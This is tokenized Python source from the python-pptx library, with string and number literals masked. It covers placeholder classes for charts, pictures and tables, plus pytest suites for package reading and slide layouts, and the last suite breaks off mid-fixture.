<EOL> return self . 
_direct_or_inherited_value ( '<STR_LIT>' ) <EOL> @ property <EOL> def width ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _direct_or_inherited_value ( '<STR_LIT:width>' ) <EOL> def _direct_or_inherited_value ( self , attr_name ) : <EOL> """<STR_LIT>""" <EOL> directly_applied_value = getattr ( <EOL> super ( LayoutPlaceholder , self ) , attr_name <EOL> ) <EOL> if directly_applied_value is not None : <EOL> return directly_applied_value <EOL> inherited_value = self . _inherited_value ( attr_name ) <EOL> return inherited_value <EOL> def _inherited_value ( self , attr_name ) : <EOL> """<STR_LIT>""" <EOL> master_placeholder = self . _master_placeholder <EOL> if master_placeholder is None : <EOL> return None <EOL> inherited_value = getattr ( master_placeholder , attr_name ) <EOL> return inherited_value <EOL> @ property <EOL> def _master_placeholder ( self ) : <EOL> """<STR_LIT>""" <EOL> inheritee_ph_type = { <EOL> PP_PLACEHOLDER . BODY : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . CHART : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . BITMAP : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . CENTER_TITLE : PP_PLACEHOLDER . TITLE , <EOL> PP_PLACEHOLDER . ORG_CHART : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . DATE : PP_PLACEHOLDER . DATE , <EOL> PP_PLACEHOLDER . FOOTER : PP_PLACEHOLDER . FOOTER , <EOL> PP_PLACEHOLDER . MEDIA_CLIP : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . OBJECT : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . PICTURE : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . SLIDE_NUMBER : PP_PLACEHOLDER . SLIDE_NUMBER , <EOL> PP_PLACEHOLDER . SUBTITLE : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . TABLE : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . TITLE : PP_PLACEHOLDER . TITLE , <EOL> } [ self . ph_type ] <EOL> slide_master = self . _slide_master <EOL> master_placeholder = slide_master . placeholders . 
get ( <EOL> inheritee_ph_type , None <EOL> ) <EOL> return master_placeholder <EOL> @ property <EOL> def _slide_master ( self ) : <EOL> """<STR_LIT>""" <EOL> slide_layout = self . part <EOL> slide_master = slide_layout . slide_master <EOL> return slide_master <EOL> class MasterPlaceholder ( BasePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> class SlidePlaceholder ( _InheritsDimensions , Shape ) : <EOL> """<STR_LIT>""" <EOL> class ChartPlaceholder ( _BaseSlidePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> def insert_chart ( self , chart_type , chart_data ) : <EOL> """<STR_LIT>""" <EOL> rId = self . part . add_chart_part ( chart_type , chart_data ) <EOL> graphicFrame = self . _new_chart_graphicFrame ( <EOL> rId , self . left , self . top , self . width , self . height <EOL> ) <EOL> self . _replace_placeholder_with ( graphicFrame ) <EOL> return PlaceholderGraphicFrame ( graphicFrame , self . _parent ) <EOL> def _new_chart_graphicFrame ( self , rId , x , y , cx , cy ) : <EOL> """<STR_LIT>""" <EOL> id_ , name = self . id , self . name <EOL> return CT_GraphicalObjectFrame . new_chart_graphicFrame ( <EOL> id_ , name , rId , x , y , cx , cy <EOL> ) <EOL> class PicturePlaceholder ( _BaseSlidePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> def insert_picture ( self , image_file ) : <EOL> """<STR_LIT>""" <EOL> pic = self . _new_placeholder_pic ( image_file ) <EOL> self . _replace_placeholder_with ( pic ) <EOL> return PlaceholderPicture ( pic , self . _parent ) <EOL> def _new_placeholder_pic ( self , image_file ) : <EOL> """<STR_LIT>""" <EOL> rId , desc , image_size = self . _get_or_add_image ( image_file ) <EOL> id_ , name = self . id , self . name <EOL> pic = CT_Picture . new_ph_pic ( id_ , name , desc , rId ) <EOL> pic . crop_to_fit ( image_size , ( self . width , self . height ) ) <EOL> return pic <EOL> def _get_or_add_image ( self , image_file ) : <EOL> """<STR_LIT>""" <EOL> image_part , rId = self . part . get_or_add_image_part ( image_file ) <EOL> desc , image_size = image_part . 
desc , image_part . _px_size <EOL> return rId , desc , image_size <EOL> class PlaceholderGraphicFrame ( GraphicFrame ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def is_placeholder ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> class PlaceholderPicture ( _InheritsDimensions , Picture ) : <EOL> """<STR_LIT>""" <EOL> class TablePlaceholder ( _BaseSlidePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> def insert_table ( self , rows , cols ) : <EOL> """<STR_LIT>""" <EOL> graphicFrame = self . _new_placeholder_table ( rows , cols ) <EOL> self . _replace_placeholder_with ( graphicFrame ) <EOL> return PlaceholderGraphicFrame ( graphicFrame , self . _parent ) <EOL> def _new_placeholder_table ( self , rows , cols ) : <EOL> """<STR_LIT>""" <EOL> id_ , name , height = self . id , self . name , Emu ( rows * <NUM_LIT> ) <EOL> return CT_GraphicalObjectFrame . new_table_graphicFrame ( <EOL> id_ , name , rows , cols , self . left , self . top , self . width , height <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function , unicode_literals <EOL> import pytest <EOL> from pptx . opc . constants import ( <EOL> CONTENT_TYPE as CT , RELATIONSHIP_TARGET_MODE as RTM <EOL> ) <EOL> from pptx . opc . oxml import CT_Relationship <EOL> from pptx . opc . packuri import PackURI <EOL> from pptx . opc . phys_pkg import _ZipPkgReader <EOL> from pptx . opc . pkgreader import ( <EOL> _ContentTypeMap , PackageReader , _SerializedPart , _SerializedRelationship , <EOL> _SerializedRelationshipCollection <EOL> ) <EOL> from . unitdata . types import a_Default , a_Types , an_Override <EOL> from . . unitutil . mock import ( <EOL> call , class_mock , function_mock , initializer_mock , method_mock , Mock , <EOL> patch <EOL> ) <EOL> class DescribePackageReader ( object ) : <EOL> @ pytest . fixture <EOL> def from_xml ( self , request ) : <EOL> return method_mock ( request , _ContentTypeMap , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def init ( self , request ) : <EOL> return initializer_mock ( request , PackageReader ) <EOL> @ pytest . fixture <EOL> def _load_serialized_parts ( self , request ) : <EOL> return method_mock ( request , PackageReader , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def PhysPkgReader_ ( self , request ) : <EOL> _patch = patch ( <EOL> '<STR_LIT>' , spec_set = _ZipPkgReader <EOL> ) <EOL> request . addfinalizer ( _patch . stop ) <EOL> return _patch . start ( ) <EOL> @ pytest . fixture <EOL> def _SerializedPart_ ( self , request ) : <EOL> return class_mock ( request , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def _SerializedRelationshipCollection_ ( self , request ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' <EOL> ) <EOL> @ pytest . fixture <EOL> def _srels_for ( self , request ) : <EOL> return method_mock ( request , PackageReader , '<STR_LIT>' ) <EOL> @ pytest . 
fixture <EOL> def _walk_phys_parts ( self , request ) : <EOL> return method_mock ( request , PackageReader , '<STR_LIT>' ) <EOL> def it_can_construct_from_pkg_file ( self , init , PhysPkgReader_ , from_xml , <EOL> _srels_for , _load_serialized_parts ) : <EOL> phys_reader = PhysPkgReader_ . return_value <EOL> content_types = from_xml . return_value <EOL> pkg_srels = _srels_for . return_value <EOL> sparts = _load_serialized_parts . return_value <EOL> pkg_file = Mock ( name = '<STR_LIT>' ) <EOL> pkg_reader = PackageReader . from_file ( pkg_file ) <EOL> PhysPkgReader_ . assert_called_once_with ( pkg_file ) <EOL> from_xml . assert_called_once_with ( phys_reader . content_types_xml ) <EOL> _srels_for . assert_called_once_with ( phys_reader , '<STR_LIT:/>' ) <EOL> _load_serialized_parts . assert_called_once_with ( phys_reader , pkg_srels , <EOL> content_types ) <EOL> phys_reader . close . assert_called_once_with ( ) <EOL> init . assert_called_once_with ( content_types , pkg_srels , sparts ) <EOL> assert isinstance ( pkg_reader , PackageReader ) <EOL> def it_can_iterate_over_the_serialized_parts ( self ) : <EOL> partname , content_type , blob = ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> spart = Mock ( name = '<STR_LIT>' , partname = partname , <EOL> content_type = content_type , blob = blob ) <EOL> pkg_reader = PackageReader ( None , None , [ spart ] ) <EOL> iter_count = <NUM_LIT:0> <EOL> for retval in pkg_reader . 
iter_sparts ( ) : <EOL> iter_count += <NUM_LIT:1> <EOL> assert retval == ( partname , content_type , blob ) <EOL> assert iter_count == <NUM_LIT:1> <EOL> def it_can_iterate_over_all_the_srels ( self ) : <EOL> pkg_srels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> sparts = [ <EOL> Mock ( name = '<STR_LIT>' , partname = '<STR_LIT>' , srels = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> Mock ( name = '<STR_LIT>' , partname = '<STR_LIT>' , srels = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ] <EOL> pkg_reader = PackageReader ( None , pkg_srels , sparts ) <EOL> generated_tuples = [ t for t in pkg_reader . iter_srels ( ) ] <EOL> expected_tuples = [ <EOL> ( '<STR_LIT:/>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:/>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> assert generated_tuples == expected_tuples <EOL> def it_can_load_serialized_parts ( self , _SerializedPart_ , _walk_phys_parts ) : <EOL> test_data = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> iter_vals = [ ( t [ <NUM_LIT:0> ] , t [ <NUM_LIT:2> ] , t [ <NUM_LIT:3> ] ) for t in test_data ] <EOL> content_types = dict ( ( t [ <NUM_LIT:0> ] , t [ <NUM_LIT:1> ] ) for t in test_data ) <EOL> phys_reader = Mock ( name = '<STR_LIT>' ) <EOL> pkg_srels = Mock ( name = '<STR_LIT>' ) <EOL> _walk_phys_parts . return_value = iter_vals <EOL> _SerializedPart_ . side_effect = expected_sparts = ( <EOL> Mock ( name = '<STR_LIT>' ) , Mock ( name = '<STR_LIT>' ) <EOL> ) <EOL> retval = PackageReader . _load_serialized_parts ( phys_reader , pkg_srels , <EOL> content_types ) <EOL> expected_calls = [ <EOL> call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> assert _SerializedPart_ . 
call_args_list == expected_calls <EOL> assert retval == expected_sparts <EOL> def it_can_walk_phys_pkg_parts ( self , _srels_for ) : <EOL> partname_1 , partname_2 , partname_3 = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> part_1_blob , part_2_blob , part_3_blob = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> srels = [ <EOL> Mock ( name = '<STR_LIT>' , is_external = True ) , <EOL> Mock ( name = '<STR_LIT>' , is_external = False , target_partname = partname_1 ) , <EOL> Mock ( name = '<STR_LIT>' , is_external = False , target_partname = partname_2 ) , <EOL> Mock ( name = '<STR_LIT>' , is_external = False , target_partname = partname_1 ) , <EOL> Mock ( name = '<STR_LIT>' , is_external = False , target_partname = partname_3 ) , <EOL> ] <EOL> pkg_srels = srels [ : <NUM_LIT:2> ] <EOL> part_1_srels = srels [ <NUM_LIT:2> : <NUM_LIT:3> ] <EOL> part_2_srels = srels [ <NUM_LIT:3> : <NUM_LIT:5> ] <EOL> part_3_srels = [ ] <EOL> phys_reader = Mock ( name = '<STR_LIT>' ) <EOL> _srels_for . side_effect = [ part_1_srels , part_2_srels , part_3_srels ] <EOL> phys_reader . blob_for . side_effect = [ <EOL> part_1_blob , part_2_blob , part_3_blob <EOL> ] <EOL> generated_tuples = [ t for t in PackageReader . _walk_phys_parts ( <EOL> phys_reader , pkg_srels ) ] <EOL> expected_tuples = [ <EOL> ( partname_1 , part_1_blob , part_1_srels ) , <EOL> ( partname_2 , part_2_blob , part_2_srels ) , <EOL> ( partname_3 , part_3_blob , part_3_srels ) , <EOL> ] <EOL> assert generated_tuples == expected_tuples <EOL> def it_can_retrieve_srels_for_a_source_uri ( <EOL> self , _SerializedRelationshipCollection_ ) : <EOL> phys_reader = Mock ( name = '<STR_LIT>' ) <EOL> source_uri = Mock ( name = '<STR_LIT>' ) <EOL> rels_xml = phys_reader . rels_xml_for . return_value <EOL> load_from_xml = _SerializedRelationshipCollection_ . load_from_xml <EOL> srels = load_from_xml . return_value <EOL> retval = PackageReader . _srels_for ( phys_reader , source_uri ) <EOL> phys_reader . 
rels_xml_for . assert_called_once_with ( source_uri ) <EOL> load_from_xml . assert_called_once_with ( source_uri . baseURI , rels_xml ) <EOL> assert retval == srels <EOL> class Describe_ContentTypeMap ( object ) : <EOL> def it_can_construct_from_ct_item_xml ( self , from_xml_fixture ) : <EOL> content_types_xml , expected_defaults , expected_overrides = ( <EOL> from_xml_fixture <EOL> ) <EOL> ct_map = _ContentTypeMap . from_xml ( content_types_xml ) <EOL> assert ct_map . _defaults == expected_defaults <EOL> assert ct_map . _overrides == expected_overrides <EOL> def it_matches_an_override_on_case_insensitive_partname ( <EOL> self , match_override_fixture ) : <EOL> ct_map , partname , content_type = match_override_fixture <EOL> assert ct_map [ partname ] == content_type <EOL> def it_falls_back_to_case_insensitive_extension_default_match ( <EOL> self , match_default_fixture ) : <EOL> ct_map , partname , content_type = match_default_fixture <EOL> assert ct_map [ partname ] == content_type <EOL> def it_should_raise_on_partname_not_found ( self ) : <EOL> ct_map = _ContentTypeMap ( ) <EOL> with pytest . raises ( KeyError ) : <EOL> ct_map [ PackURI ( '<STR_LIT>' ) ] <EOL> def it_should_raise_on_key_not_instance_of_PackURI ( self ) : <EOL> ct_map = _ContentTypeMap ( ) <EOL> ct_map . _add_override ( PackURI ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> with pytest . raises ( KeyError ) : <EOL> ct_map [ '<STR_LIT>' ] <EOL> @ pytest . fixture <EOL> def from_xml_fixture ( self ) : <EOL> entries = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , CT . XML ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , CT . PNG ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , CT . PML_PRESENTATION_MAIN ) , <EOL> ) <EOL> content_types_xml = self . _xml_from ( entries ) <EOL> expected_defaults = { } <EOL> expected_overrides = { } <EOL> for entry in entries : <EOL> if entry [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> ext = entry [ <NUM_LIT:1> ] . 
lower ( ) <EOL> content_type = entry [ <NUM_LIT:2> ] <EOL> expected_defaults [ ext ] = content_type <EOL> elif entry [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> partname , content_type = entry [ <NUM_LIT:1> : ] <EOL> expected_overrides [ partname ] = content_type <EOL> return content_types_xml , expected_defaults , expected_overrides <EOL> @ pytest . fixture ( params = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def match_default_fixture ( self , request ) : <EOL> partname_str , ext , content_type = request . param <EOL> partname = PackURI ( partname_str ) <EOL> ct_map = _ContentTypeMap ( ) <EOL> ct_map . _add_override ( PackURI ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> ct_map . _add_default ( ext , content_type ) <EOL> return ct_map , partname , content_type <EOL> @ pytest . fixture ( params = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def match_override_fixture ( self , request ) : <EOL> partname_str , should_match_partname_str = request . param <EOL> partname = PackURI ( partname_str ) <EOL> should_match_partname = PackURI ( should_match_partname_str ) <EOL> content_type = '<STR_LIT>' <EOL> ct_map = _ContentTypeMap ( ) <EOL> ct_map . _add_override ( partname , content_type ) <EOL> return ct_map , should_match_partname , content_type <EOL> def _xml_from ( self , entries ) : <EOL> """<STR_LIT>""" <EOL> types_bldr = a_Types ( ) . with_nsdecls ( ) <EOL> for entry in entries : <EOL> if entry [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> ext , content_type = entry [ <NUM_LIT:1> : ] <EOL> default_bldr = a_Default ( ) <EOL> default_bldr . with_Extension ( ext ) <EOL> default_bldr . with_ContentType ( content_type ) <EOL> types_bldr . 
with_child ( default_bldr ) <EOL> elif entry [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> partname , content_type = entry [ <NUM_LIT:1> : ] <EOL> override_bldr = an_Override ( ) <EOL> override_bldr . with_PartName ( partname ) <EOL> override_bldr . with_ContentType ( content_type ) <EOL> types_bldr . with_child ( override_bldr ) <EOL> return types_bldr . xml ( ) <EOL> class Describe_SerializedPart ( object ) : <EOL> def it_remembers_construction_values ( self ) : <EOL> partname = '<STR_LIT>' <EOL> content_type = '<STR_LIT>' <EOL> blob = '<STR_LIT>' <EOL> srels = '<STR_LIT>' <EOL> spart = _SerializedPart ( partname , content_type , blob , srels ) <EOL> assert spart . partname == partname <EOL> assert spart . content_type == content_type <EOL> assert spart . blob == blob <EOL> assert spart . srels == srels <EOL> class Describe_SerializedRelationship ( object ) : <EOL> def it_remembers_construction_values ( self ) : <EOL> rel_elm = CT_Relationship . new ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , RTM . INTERNAL <EOL> ) <EOL> srel = _SerializedRelationship ( '<STR_LIT:/>' , rel_elm ) <EOL> assert srel . rId == '<STR_LIT>' <EOL> assert srel . reltype == '<STR_LIT>' <EOL> assert srel . target_ref == '<STR_LIT>' <EOL> assert srel . target_mode == RTM . INTERNAL <EOL> def it_knows_when_it_is_external ( self ) : <EOL> cases = ( RTM . INTERNAL , RTM . EXTERNAL ) <EOL> expected_values = ( False , True ) <EOL> for target_mode , expected_value in zip ( cases , expected_values ) : <EOL> rel_elm = CT_Relationship . new ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , target_mode <EOL> ) <EOL> srel = _SerializedRelationship ( None , rel_elm ) <EOL> assert srel . 
is_external is expected_value <EOL> def it_can_calculate_its_target_partname ( self ) : <EOL> cases = ( <EOL> ( '<STR_LIT:/>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> for baseURI , target_ref , expected_partname in cases : <EOL> rel_elm = Mock ( name = '<STR_LIT>' , rId = None , reltype = None , <EOL> target_ref = target_ref , target_mode = RTM . INTERNAL ) <EOL> srel = _SerializedRelationship ( baseURI , rel_elm ) <EOL> assert srel . target_partname == expected_partname <EOL> def it_raises_on_target_partname_when_external ( self ) : <EOL> rel_elm = CT_Relationship . new ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , RTM . EXTERNAL <EOL> ) <EOL> srel = _SerializedRelationship ( '<STR_LIT:/>' , rel_elm ) <EOL> with pytest . raises ( ValueError ) : <EOL> srel . target_partname <EOL> class Describe_SerializedRelationshipCollection ( object ) : <EOL> def it_can_load_from_xml ( self , parse_xml , _SerializedRelationship_ ) : <EOL> baseURI , rels_item_xml , rel_elm_1 , rel_elm_2 = ( <EOL> Mock ( name = '<STR_LIT>' ) , Mock ( name = '<STR_LIT>' ) , <EOL> Mock ( name = '<STR_LIT>' ) , Mock ( name = '<STR_LIT>' ) , <EOL> ) <EOL> rels_elm = Mock ( <EOL> name = '<STR_LIT>' , relationship_lst = [ rel_elm_1 , rel_elm_2 ] <EOL> ) <EOL> parse_xml . return_value = rels_elm <EOL> srels = _SerializedRelationshipCollection . load_from_xml ( <EOL> baseURI , rels_item_xml <EOL> ) <EOL> expected_calls = [ <EOL> call ( baseURI , rel_elm_1 ) , <EOL> call ( baseURI , rel_elm_2 ) , <EOL> ] <EOL> parse_xml . assert_called_once_with ( rels_item_xml ) <EOL> assert _SerializedRelationship_ . 
call_args_list == expected_calls <EOL> assert isinstance ( srels , _SerializedRelationshipCollection ) <EOL> def it_should_be_iterable ( self ) : <EOL> srels = _SerializedRelationshipCollection ( ) <EOL> try : <EOL> for x in srels : <EOL> pass <EOL> except TypeError : <EOL> msg = "<STR_LIT>" <EOL> pytest . fail ( msg ) <EOL> @ pytest . fixture <EOL> def parse_xml ( self , request ) : <EOL> return function_mock ( request , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def _SerializedRelationship_ ( self , request ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import pytest <EOL> from pptx . enum . shapes import PP_PLACEHOLDER <EOL> from pptx . opc . constants import RELATIONSHIP_TYPE as RT <EOL> from pptx . oxml . shapes . autoshape import CT_Shape <EOL> from pptx . parts . slidelayout import ( <EOL> _LayoutPlaceholders , _LayoutShapeFactory , _LayoutShapeTree , SlideLayout <EOL> ) <EOL> from pptx . parts . slidemaster import SlideMaster <EOL> from pptx . shapes . base import BaseShape <EOL> from pptx . shapes . placeholder import LayoutPlaceholder <EOL> from . . oxml . unitdata . shape import a_ph , a_pic , an_nvPr , an_nvSpPr , an_sp <EOL> from . . unitutil . mock import ( <EOL> class_mock , function_mock , instance_mock , method_mock , property_mock <EOL> ) <EOL> class DescribeSlideLayout ( object ) : <EOL> def it_knows_the_slide_master_it_inherits_from ( self , master_fixture ) : <EOL> slide_layout , slide_master_ = master_fixture <EOL> slide_master = slide_layout . slide_master <EOL> slide_layout . part_related_by . assert_called_once_with ( RT . SLIDE_MASTER ) <EOL> assert slide_master is slide_master_ <EOL> def it_provides_access_to_its_shapes ( self , shapes_fixture ) : <EOL> slide_layout , _LayoutShapeTree_ , layout_shape_tree_ = shapes_fixture <EOL> shapes = slide_layout . shapes <EOL> _LayoutShapeTree_ . assert_called_once_with ( slide_layout ) <EOL> assert shapes is layout_shape_tree_ <EOL> def it_provides_access_to_its_placeholders ( self , placeholders_fixture ) : <EOL> slide_layout , _LayoutPlaceholders_ , layout_placeholders_ = ( <EOL> placeholders_fixture <EOL> ) <EOL> placeholders = slide_layout . placeholders <EOL> _LayoutPlaceholders_ . 
assert_called_once_with ( slide_layout ) <EOL> assert placeholders is layout_placeholders_ <EOL> def it_can_iterate_over_the_clonable_placeholders_it_contains ( <EOL> self , cloneable_fixture ) : <EOL> slide_layout , expected_placeholders = cloneable_fixture <EOL> cloneable_placeholders = ( <EOL> list ( slide_layout . iter_cloneable_placeholders ( ) ) <EOL> ) <EOL> assert cloneable_placeholders == expected_placeholders <EOL> @ pytest . fixture ( params = [ <EOL> ( ( PP_PLACEHOLDER . TITLE , PP_PLACEHOLDER . BODY ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) , <EOL> ( ( PP_PLACEHOLDER . TITLE , PP_PLACEHOLDER . DATE ) , ( <NUM_LIT:0> , ) ) , <EOL> ( ( PP_PLACEHOLDER . DATE , PP_PLACEHOLDER . OBJECT ) , ( <NUM_LIT:1> , ) ) , <EOL> ( ( PP_PLACEHOLDER . DATE , PP_PLACEHOLDER . FOOTER ) , ( ) ) , <EOL> ] ) <EOL> def cloneable_fixture ( <EOL> self , request , placeholders_ , placeholder_ , placeholder_2_ ) : <EOL> ph_types , expected_indices = request . param <EOL> slide_layout = SlideLayout ( None , None , None , None ) <EOL> placeholder_ . ph_type , placeholder_2_ . ph_type = ph_types <EOL> expected_placeholders = [ ] <EOL> for idx in expected_indices : <EOL> expected_placeholders . append ( placeholders_ . return_value [ idx ] ) <EOL> return slide_layout , expected_placeholders <EOL> @ pytest . fixture <EOL> def master_fixture ( self , slide_master_ , part_related_by_ ) : <EOL> slide_layout = SlideLayout ( None , None , None , None ) <EOL> return slide_layout , slide_master_ <EOL> @ pytest . fixture <EOL> def placeholders_fixture ( <EOL> self , _LayoutPlaceholders_ , layout_placeholders_ ) : <EOL> slide_layout = SlideLayout ( None , None , None , None ) <EOL> return slide_layout , _LayoutPlaceholders_ , layout_placeholders_ <EOL> @ pytest . fixture <EOL> def shapes_fixture ( self , _LayoutShapeTree_ , layout_shape_tree_ ) : <EOL> slide_layout = SlideLayout ( None , None , None , None ) <EOL> return slide_layout , _LayoutShapeTree_ , layout_shape_tree_ <EOL> @ pytest . 
fixture <EOL> def _LayoutPlaceholders_ ( self , request , layout_placeholders_ ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_placeholders_ <EOL> ) <EOL> @ pytest . fixture <EOL> def _LayoutShapeTree_ ( self , request , layout_shape_tree_ ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_shape_tree_ <EOL> ) <EOL> @ pytest . fixture <EOL> def layout_placeholders_ ( self , request ) : <EOL> return instance_mock ( request , _LayoutPlaceholders ) <EOL> @ pytest . fixture <EOL> def layout_shape_tree_ ( self , request ) : <EOL> return instance_mock ( request , _LayoutShapeTree ) <EOL> @ pytest . fixture <EOL> def part_related_by_ ( self , request , slide_master_ ) : <EOL> return method_mock ( <EOL> request , SlideLayout , '<STR_LIT>' , <EOL> return_value = slide_master_ <EOL> ) <EOL> @ pytest . fixture <EOL> def placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def placeholder_2_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def placeholders_ ( self , request , placeholder_ , placeholder_2_ ) : <EOL> return property_mock ( <EOL> request , SlideLayout , '<STR_LIT>' , <EOL> return_value = [ placeholder_ , placeholder_2_ ] <EOL> ) <EOL> @ pytest . fixture <EOL> def slide_master_ ( self , request ) : <EOL> return instance_mock ( request , SlideMaster ) <EOL> class Describe_LayoutShapeTree ( object ) : <EOL> def it_constructs_a_layout_placeholder_for_a_placeholder_shape ( <EOL> self , factory_fixture ) : <EOL> layout_shapes , ph_elm_ , _LayoutShapeFactory_ , layout_placeholder_ = ( <EOL> factory_fixture <EOL> ) <EOL> layout_placeholder = layout_shapes . _shape_factory ( ph_elm_ ) <EOL> _LayoutShapeFactory_ . assert_called_once_with ( ph_elm_ , layout_shapes ) <EOL> assert layout_placeholder is layout_placeholder_ <EOL> @ pytest . 
fixture <EOL> def factory_fixture ( <EOL> self , ph_elm_ , _LayoutShapeFactory_ , layout_placeholder_ ) : <EOL> layout_shapes = _LayoutShapeTree ( None ) <EOL> return ( <EOL> layout_shapes , ph_elm_ , _LayoutShapeFactory_ , layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture <EOL> def layout_placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def _LayoutShapeFactory_ ( self , request , layout_placeholder_ ) : <EOL> return function_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture <EOL> def ph_elm_ ( self , request ) : <EOL> return instance_mock ( request , CT_Shape ) <EOL> class Describe_LayoutShapeFactory ( object ) : <EOL> def it_constructs_a_layout_placeholder_for_a_shape_element ( <EOL> self , factory_fixture ) : <EOL> shape_elm , parent_ , ShapeConstructor_ , shape_ = factory_fixture <EOL> shape = _LayoutShapeFactory ( shape_elm , parent_ ) <EOL> ShapeConstructor_ . assert_called_once_with ( shape_elm , parent_ ) <EOL> assert shape is shape_ <EOL> @ pytest . fixture ( params = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def factory_fixture ( <EOL> self , request , ph_bldr , slide_layout_ , _LayoutPlaceholder_ , <EOL> layout_placeholder_ , BaseShapeFactory_ , base_shape_ ) : <EOL> shape_bldr , ShapeConstructor_ , shape_mock = { <EOL> '<STR_LIT>' : ( ph_bldr , _LayoutPlaceholder_ , layout_placeholder_ ) , <EOL> '<STR_LIT>' : ( an_sp ( ) , BaseShapeFactory_ , base_shape_ ) , <EOL> '<STR_LIT>' : ( a_pic ( ) , BaseShapeFactory_ , base_shape_ ) , <EOL> } [ request . param ] <EOL> shape_elm = shape_bldr . with_nsdecls ( ) . element <EOL> return shape_elm , slide_layout_ , ShapeConstructor_ , shape_mock <EOL> @ pytest . fixture <EOL> def BaseShapeFactory_ ( self , request , base_shape_ ) : <EOL> return function_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = base_shape_ <EOL> ) <EOL> @ pytest . 
